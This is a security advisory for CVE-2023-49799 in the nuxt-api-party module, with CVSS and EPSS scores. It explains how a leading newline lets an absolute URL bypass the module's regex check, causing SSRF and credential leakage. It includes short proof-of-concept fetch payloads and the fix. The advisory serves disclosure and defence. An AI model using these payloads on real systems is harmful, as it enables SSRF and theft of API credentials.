7.5 High
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
NONE
User Interaction
NONE
Scope
UNCHANGED
Confidentiality Impact
HIGH
Integrity Impact
NONE
Availability Impact
NONE
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
6.9 Medium
AI Score
Confidence
High
0.001 Low
EPSS
Percentile
32.6%
nuxt-api-party
allows developers to proxy requests to an API without exposing credentials to the client. A previous vulnerability allowed an attacker to change the baseURL of the request, potentially leading to credentials being leaked or SSRF.
This vulnerability is similar, and was caused by a recent change to the detection of absolute URLs, which is no longer sufficient to prevent SSRF.
nuxt-api-party
attempts to check if the user has passed an absolute URL to prevent the aforementioned attack. This has been recently changed to use a regular expression ^https?://
.
This regular expression can be bypassed by an absolute URL with leading whitespace. For example \nhttps://whatever.com
has a leading newline.
According to the fetch specification, before a fetch is made the URL is normalized. “To normalize a byte sequence potentialValue, remove any leading and trailing HTTP whitespace bytes from potentialValue.” (source)
This means the final request will be normalized to https://whatever.com
. We have bypassed the check and nuxt-api-party
will send a request outside of the whitelist.
This could allow us to leak credentials or perform SSRF.
POC using Node.
await fetch("/api/__api_party/MyEndpoint", {
method: "POST",
body: JSON.stringify({ path: "\nhttps://google.com" }),
headers: { "Content-Type": "application/json" }
})
We can use __proto__
as a substitute for the endpoint if it is not known. This will not leak any credentials as all attributes on endpoint
will be undefined.
await fetch("/api/__api_party/__proto__", {
method: "POST",
body: JSON.stringify({ path: "\nhttps://google.com" }),
headers: { "Content-Type": "application/json" }
})
Leak of sensitive API credentials. SSRF.
Revert to the previous method of detecting absolute URLs.
if (new URL(path, 'http://localhost').origin !== 'http://localhost') {
// ...
}
CPE | Name | Operator | Version |
---|---|---|---|
nuxt-api-party | lt | 0.22.0 |
fetch.spec.whatwg.org
fetch.spec.whatwg.org/#http-whitespace-byte
github.com/johannschopplich/nuxt-api-party
github.com/johannschopplich/nuxt-api-party/blob/777462e1e3af1d9f8938aa33f230cd8cb6e0cc9a/src/runtime/server/handler.ts#L31
github.com/johannschopplich/nuxt-api-party/commit/72762a200fc19d997a0f84bce578c28698dc5270
github.com/johannschopplich/nuxt-api-party/security/advisories/GHSA-3wfp-253j-5jxv
infra.spec.whatwg.org/#byte-sequence
nvd.nist.gov/vuln/detail/CVE-2023-49799
7.5 High
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
NONE
User Interaction
NONE
Scope
UNCHANGED
Confidentiality Impact
HIGH
Integrity Impact
NONE
Availability Impact
NONE
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
6.9 Medium
AI Score
Confidence
High
0.001 Low
EPSS
Percentile
32.6%